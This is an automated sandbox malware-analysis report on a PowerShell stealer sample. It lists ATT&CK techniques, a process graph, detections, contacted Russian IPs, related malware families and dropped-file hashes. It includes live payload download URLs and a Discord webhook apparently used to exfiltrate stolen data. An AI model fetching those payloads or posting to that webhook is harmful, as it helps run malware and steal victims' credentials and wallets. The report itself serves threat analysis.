            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution
            1
            Scheduled Task/Job
            112
            Process Injection
            121
            Obfuscated Files or Information
            LSASS Memory1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job
            2
            Registry Run Keys / Startup Folder
            1
            Scheduled Task/Job
            1
            Software Packing
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares2
            Clipboard Data
            1
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts3
            PowerShell
            Login Hook2
            Registry Run Keys / Startup Folder
            1
            DLL Side-Loading
            NTDS24
            System Information Discovery
            Distributed Component Object ModelInput Capture21
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Masquerading
            LSA Secrets131
            Security Software Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
            Virtualization/Sandbox Evasion
            Cached Domain Credentials2
            Process Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items112
            Process Injection
            DCSync21
            Virtualization/Sandbox Evasion
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1583431 Sample: 2 ps1.ps1 Startdate: 02/01/2025 Architecture: WINDOWS Score: 100 63 Malicious sample detected (through community Yara rule) 2->63 65 Antivirus detection for URL or domain 2->65 67 Antivirus detection for dropped file 2->67 69 16 other signatures 2->69 12 powershell.exe 11 2->12         started        process3 signatures4 73 Suspicious powershell command line found 12->73 75 Found many strings related to Crypto-Wallets (likely being stolen) 12->75 77 Encrypted powershell cmdline option found 12->77 79 3 other signatures 12->79 15 powershell.exe 14 20 12->15         started        19 conhost.exe 12->19         started        process5 dnsIp6 59 147.45.44.131, 49716, 49721, 80 FREE-NET-ASFREEnetEU Russian Federation 15->59 61 185.149.146.164, 49714, 80 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 15->61 47 C:\Windows\Temp\iviewers.dll, PE32 15->47 dropped 49 C:\Windows\Temp\Package.exe, PE32 15->49 dropped 51 C:\Users\user\AppData\...\DeleteApp.url, MS 15->51 dropped 21 cmd.exe 1 15->21         started        file7 process8 process9 23 Package.exe 21->23         started        process10 25 cmd.exe 1 23->25         started        28 WerFault.exe 23 16 23->28         started        signatures11 71 Suspicious powershell command line found 25->71 30 powershell.exe 15 22 25->30         started        34 conhost.exe 25->34         started        process12 file13 55 C:\Users\user\AppData\...\iacipmps.cmdline, Unicode 30->55 dropped 57 C:\Users\user\AppData\Local\...\iacipmps.0.cs, Unicode 30->57 dropped 81 Found many strings related to Crypto-Wallets (likely being stolen) 30->81 83 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 30->83 85 Suspicious execution chain found 30->85 87 Compiles code for process injection (via .Net compiler) 30->87 36 csc.exe 3 30->36         started        39 RegAsm.exe 30->39         started        41 RegAsm.exe 30->41         started        43 3 other processes 30->43 signatures14 process15 file16 53 C:\Users\user\AppData\Local\...\iacipmps.dll, PE32 36->53 dropped 45 cvtres.exe 1 36->45         started        process17

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            2 ps1.ps13%ReversingLabs
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.dll100%AviraHEUR/AGEN.1300034
            C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.dll100%Joe Sandbox ML
            C:\Windows\Temp\Package.exe0%ReversingLabs
            C:\Windows\Temp\iviewers.dll3%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://147.45.44.131/infopage/ersyb.exe100%Avira URL Cloudmalware
            http://147.45.44.131/infopage/file.exe0%Avira URL Cloudsafe
            http://147.45.448JU0%Avira URL Cloudsafe
            http://147.45.44.131/infopage/iubn.ps1100%Avira URL Cloudmalware
            http://147.45.44.131/infopage/iviewers.dll100%Avira URL Cloudmalware
            http://147.45.44.131/infopage/rwvg1.exe100%Avira URL Cloudmalware
            http://147.45.44.131/infopage/ersyb.exe0W0%Avira URL Cloudsafe
            http://185.149.146.1640%Avira URL Cloudsafe
            http://147.45.448V0%Avira URL Cloudsafe
            http://185.149.146.164/wrcaf.ps1100%Avira URL Cloudmalware
            No contacted domains info
            NameMaliciousAntivirus DetectionReputation
            http://147.45.44.131/infopage/file.exetrue
            • Avira URL Cloud: safe
            unknown
            http://147.45.44.131/infopage/iubn.ps1true
            • Avira URL Cloud: malware
            unknown
            http://185.149.146.164/wrcaf.ps1false
            • Avira URL Cloud: malware
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://147.45.44.131/infopage/ersyb.exepowershell.exe, 00000008.00000002.2248203691.0000000004FD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2288952062.0000000008670000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000009.00000003.2208675662.00000000052C6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000009.00000003.2208452005.00000000052D5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000009.00000003.2208523176.00000000052C4000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000009.00000003.2209557435.00000000052C6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000009.00000002.2210070157.00000000052C6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000009.00000003.2208576514.00000000052D5000.00000004.00000020.00020000.00000000.sdmp, iacipmps.dll.9.dr, iacipmps.0.cs.8.drfalse
            • Avira URL Cloud: malware
            unknown
            http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.2209534008.00000169BFC31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2209534008.00000169BFD73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005D19000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2248203691.0000000004E06000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2248203691.0000000004E06000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://go.micropowershell.exe, 00000003.00000002.2177596881.00000169B07F3000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://discordapp.com/api/v6/users/powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://contoso.com/Licensepowershell.exe, 00000008.00000002.2262741450.0000000005D19000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Iconpowershell.exe, 00000008.00000002.2262741450.0000000005D19000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://upx.sf.netAmcache.hve.19.drfalse
                            high
                            https://aka.ms/pscore6powershell.exe, 00000000.00000002.2225680546.0000025C42951000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://147.45.448JUpowershell.exe, 00000008.00000002.2248203691.000000000506F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://147.45.44.131/infopage/ersyb.exe0Wcsc.exe, 00000009.00000003.2209327326.0000000005571000.00000004.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2248203691.0000000004E06000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://urn.to/r/sds_seeaCouldpowershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://147.45.44.131/infopage/iviewers.dllpowershell.exe, 00000003.00000002.2177596881.00000169B11B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://james.newtonking.com/projects/jsonpowershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.newtonsoft.com/jsonschemapowershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://147.45.44.131powershell.exe, 00000003.00000002.2177596881.00000169B17AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2177596881.00000169B1497000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.000000000506F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.0000000004E06000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://147.45.44.131/infopage/rwvg1.exepowershell.exe, 00000008.00000002.2248203691.0000000004EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://crl.mpowershell.exe, 00000008.00000002.2283880375.00000000072F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://stackoverflow.com/q/14436606/23354cItpowershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://ipinfo.io/ippowershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://github.com/LimerBoy/StormKittypowershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.0000000004EF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.0000000004FD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.000000000525B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://aka.ms/pscore6lBpowershell.exe, 00000008.00000002.2248203691.0000000004CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://stackoverflow.com/q/11564914/23354;powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://stackoverflow.com/q/2152978/23354powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://contoso.com/powershell.exe, 00000008.00000002.2262741450.0000000005D19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2209534008.00000169BFC31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2209534008.00000169BFD73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005D19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://147.45.448Vpowershell.exe, 00000008.00000002.2248203691.0000000004FD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://aka.ms/pscore68powershell.exe, 00000000.00000002.2225680546.0000025C4296A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2177596881.00000169AFBC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://urn.to/r/sds_seepowershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2225680546.0000025C4299C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2177596881.00000169AFBC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.0000000004CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://185.149.146.164powershell.exe, 00000003.00000002.2177596881.00000169B07F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  185.149.146.164
                                                                  unknownRussian Federation
                                                                  42861FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUfalse
                                                                  147.45.44.131
                                                                  unknownRussian Federation
                                                                  2895FREE-NET-ASFREEnetEUtrue
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1583431
                                                                  Start date and time:2025-01-02 19:13:06 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 6m 53s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:21
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:2 ps1.ps1
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.expl.evad.winPS1@28/23@0/2
                                                                  EGA Information:
                                                                  • Successful, ratio: 50%
                                                                  HCA Information:
                                                                  • Successful, ratio: 99%
                                                                  • Number of executed functions: 49
                                                                  • Number of non-executed functions: 154
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .ps1
                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.190.159.64, 13.107.246.45, 52.149.20.212
                                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target powershell.exe, PID 2180 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 3200 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: 2 ps1.ps1
                                                                  TimeTypeDescription
                                                                  13:14:06API Interceptor67x Sleep call for process: powershell.exe modified
                                                                  13:14:25API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                  19:14:14AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  185.149.146.164ps1.ps1Get hashmaliciousUnknownBrowse
                                                                  • 185.149.146.164/trwsfg.ps1
                                                                  147.45.44.131vfrcxq.ps1Get hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                  • 147.45.44.131/infopage/yijth.exe
                                                                  vfdjo.exeGet hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                  • 147.45.44.131/infopage/yijth.exe
                                                                  gqub.batGet hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                  • 147.45.44.131/infopage/yijth.exe
                                                                  trwsfg.ps1Get hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                  • 147.45.44.131/infopage/yijth.exe
                                                                  iviewers.dllGet hashmaliciousLummaCBrowse
                                                                  • 147.45.44.131/infopage/hgfpj.exe
                                                                  qoqD1RxV0F.exeGet hashmaliciousLummaCBrowse
                                                                  • 147.45.44.131/infopage/inbg.exe
                                                                  iviewers.dllGet hashmaliciousLummaCBrowse
                                                                  • 147.45.44.131/infopage/inbg.exe
                                                                  Captcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                                  • 147.45.44.131/infopage/bnkh.exe
                                                                  htZgRRla8S.exeGet hashmaliciousLummaC StealerBrowse
                                                                  • 147.45.44.131/infopage/ung0.exe
                                                                  Captcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                                  • 147.45.44.131/infopage/ilk.exe
                                                                  No context
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUps1.ps1Get hashmaliciousUnknownBrowse
                                                                  • 185.149.146.164
                                                                  https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                  • 185.149.146.164
                                                                  armv4l.elfGet hashmaliciousUnknownBrowse
                                                                  • 185.149.148.61
                                                                  arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  • 77.91.103.44
                                                                  LRkZCtzQ3.ps1Get hashmaliciousUnknownBrowse
                                                                  • 77.91.73.101
                                                                  GottaBolt.exeGet hashmaliciousUnknownBrowse
                                                                  • 77.91.73.101
                                                                  GottaBolt.exeGet hashmaliciousUnknownBrowse
                                                                  • 77.91.73.101
                                                                  T0jSGXdxX5.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  • 185.149.146.15
                                                                  PC4rbXSgl4.exeGet hashmaliciousUnknownBrowse
                                                                  • 77.91.77.187
                                                                  file.exeGet hashmaliciousPhorpiexBrowse
                                                                  • 77.91.77.92
                                                                  FREE-NET-ASFREEnetEUlDO4WBEQyL.exeGet hashmaliciousGO BackdoorBrowse
                                                                  • 147.45.196.157
                                                                  vfrcxq.ps1Get hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                  • 147.45.44.131
                                                                  vfdjo.exeGet hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                  • 147.45.44.131
                                                                  gqub.batGet hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                  • 147.45.44.131
                                                                  trwsfg.ps1Get hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRATBrowse
                                                                  • 147.45.44.131
                                                                  https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                  • 147.45.44.131
                                                                  Loader.exeGet hashmaliciousMeduza StealerBrowse
                                                                  • 147.45.44.216
                                                                  tzA45NGAW4.lnkGet hashmaliciousUnknownBrowse
                                                                  • 147.45.49.155
                                                                  soft 1.14.exeGet hashmaliciousMeduza StealerBrowse
                                                                  • 147.45.44.216
                                                                  iviewers.dllGet hashmaliciousLummaCBrowse
                                                                  • 147.45.44.131
                                                                  No context
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  C:\Windows\Temp\Package.exescript.ps1Get hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                    script.htaGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):65536
                                                                      Entropy (8bit):0.9015116234622907
                                                                      Encrypted:false
                                                                      SSDEEP:192:WxyPHwfZpigh0K5Q+BjG7aQqzuiFXZ24IO80:uyPHwBpigiK5Q+BjRzuiFXY4IO80
                                                                      MD5:36D7CCA06A33F1B1F2D99C06AA6B3ED0
                                                                      SHA1:53C204D68FE062DA582F1E74730742CD156F11BB
                                                                      SHA-256:C4C646E0D48330BACF83E0EAFEC11AFB2896BAE36148BCDE2EF7344609CEE91F
                                                                      SHA-512:4AA5C3896DC66AB202D205E3AFD0C40D48C1ED47F37A5440AC1F7C297E9E9162733CDC03CE274AE99D9DB5F048900953E4F83782D6461AC2377A624ABBCF9630
                                                                      Malicious:false
                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.3.1.5.2.6.1.5.0.9.2.1.8.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.3.1.5.2.6.2.4.1.5.4.6.7.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.6.1.2.a.c.2.6.-.7.d.5.9.-.4.5.0.f.-.a.3.6.5.-.5.8.a.4.a.1.9.5.2.7.e.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.3.a.3.a.b.f.-.3.9.0.4.-.4.a.7.5.-.8.2.0.3.-.6.4.9.d.4.e.1.e.e.1.f.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.a.c.k.a.g.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.O.L.E.V.I.E.W...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.9.c.-.0.0.0.1.-.0.0.1.4.-.4.6.a.6.-.7.1.1.e.4.2.5.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.2.5.6.b.a.6.7.4.a.c.b.7.8.b.b.9.d.d.5.0.0.d.6.f.4.c.d.0.1.4.b.0.0.0.0.0.9.0.4.!.0.0.0.0.e.4.1.0.6.8.6.1.0.7.6.9.8.1.7.9.9.7.1.9.8.7.6.0.1.9.f.e.5.2.2.4.e.a.c.2.6.5.5.c.!.P.a.c.
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Mini DuMP crash report, 14 streams, Thu Jan 2 18:14:21 2025, 0x1205a4 type
                                                                      Category:dropped
                                                                      Size (bytes):31894
                                                                      Entropy (8bit):2.6145503567531416
                                                                      Encrypted:false
                                                                      SSDEEP:96:5c8xNsAUeetUGnJ7hhMTbjtLKIYOiFrgi7Co1z65FdumVweYe/CZ/OYfOUHxfmrl:ZkbhYN6UOz2puJ0LUGi4qprPrl9h6
                                                                      MD5:9F4C36E6AF7017C587FDB7C541BC8D4A
                                                                      SHA1:2188AA7031968AF0A0153AF432E853F8582566CC
                                                                      SHA-256:D30DC04F05007FD155943D1BEEA604B831B607A7C892A29220DAB577587188B3
                                                                      SHA-512:941A7238E1248F498AD6C51D091D3B6D50F0E5D086F81B8D87BCD8928E83B1B161C9155FFC122D6D40F8677CDC0EB5316A9B52EC55BD1948380DC9BA3046C5A7
                                                                      Malicious:false
                                                                      Preview:MDMP..a..... .......}.vg............4...........P...<...........P%..........T.......8...........T...........8...^h......................x...............................................................................eJ..............GenuineIntel............T...........q.vg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):8338
                                                                      Entropy (8bit):3.68990649255784
                                                                      Encrypted:false
                                                                      SSDEEP:192:R6l7wVeJNw6o+6Y8aVSUFTgmf2axWrpDG89bjYsfIhm:R6lXJ66p6YDSUhgmf2axojLfz
                                                                      MD5:09150379EF70D9081CC3927ED13C2364
                                                                      SHA1:1A8B76E4B5E8AE896FA831D2690496940BE59B71
                                                                      SHA-256:19143B54978A5AC0CDDA9A3D25204F226FC2AB5B772CE32466A2D6CB45B15804
                                                                      SHA-512:61F050A2B9F6F84E4D47D6CC27924E5B7830D99CABDE83548ADBA058F183DBB0E08B356B0D5E49B289FA1B01D7BE932896FBE9EAA750C468BC43A6C0E02843F0
                                                                      Malicious:false
                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.9.7.2.<./.P.i.
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4741
                                                                      Entropy (8bit):4.459452469518885
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwWl8zsPJg77aI97YWpW8VYOYm8M4JwerFhFDoq2o+q8vqFKsfQyJod:uIjfxI71R7V+Jwe2oKjsfhJod
                                                                      MD5:6EB91043F67EA1CEE557B52EA05ADA88
                                                                      SHA1:6755966EE79042CDDA81C45A2F8CECB1D85F950C
                                                                      SHA-256:59AC6C8CE8412DE4AEDE8144A8C11F5E8D3F24139D4BA2E335F81054C341500A
                                                                      SHA-512:B241DD0AC9B5E11C57253C4ED0D1BFB4A8AC7F24CF94EAB1A045A0487E38937735A44CE7652C9B9B31459E609BC20D855E859B3DBF4ED037EBAEA2E2E7B31DB4
                                                                      Malicious:false
